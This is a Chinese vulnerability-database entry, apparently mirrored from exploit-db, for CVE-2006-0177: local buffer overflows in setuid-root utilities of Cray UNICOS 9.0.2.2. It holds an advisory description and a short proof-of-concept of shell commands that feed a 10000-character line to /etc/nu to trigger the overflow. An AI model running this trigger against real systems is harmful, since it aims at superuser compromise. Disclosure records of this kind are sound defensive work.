Cray UNICOS 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109613 漏洞类型 缓冲区溢出
发布时间 2006-01-10 更新时间 2006-01-16
CVE编号 CVE-2006-0177 CNNVD-ID CNNVD-200601-114
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/27066
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-114
|漏洞详情
CrayUNICOS9.0.2.2中存在多个缓冲区溢出,本地用户可以通过(1)调用具有长命令行参数的/usr/bin/script或(2)将/etc/nu的-c选项设置为包含长行的文件名称来获取特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/16205/info
 
Cray UNICOS is prone to locally exploitable buffer overflow vulnerabilities. These issues are due to insufficient bounds checking of command line parameters in various utilities with setuid-superuser privileges.
 
Successful exploitation could result in execution of malicious machine code with superuser privileges, facilitating the complete compromise of affected computers.
 
These issues are reported in version 9.0.2.2 of UNICOS; other versions may also be affected. 

for '/etc/nu':
echo "" >> /tmp/acid
udbgen -p /tmp
echo `perl -e 'print "A"x10000'` >> /tmp/script
/etc/nu -p /tmp -c /tmp/script -a
|参考资料

来源:BID
名称:16205
链接:http://www.securityfocus.com/bid/16205
来源:FULLDISC
名称:20060110SUIDrootoverflowsinUNICOSandpartialshellcode
链接:http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0343.html
来源:XF
名称:unicos-command-line-bo(24276)
链接:http://xforce.iss.net/xforce/xfdb/24276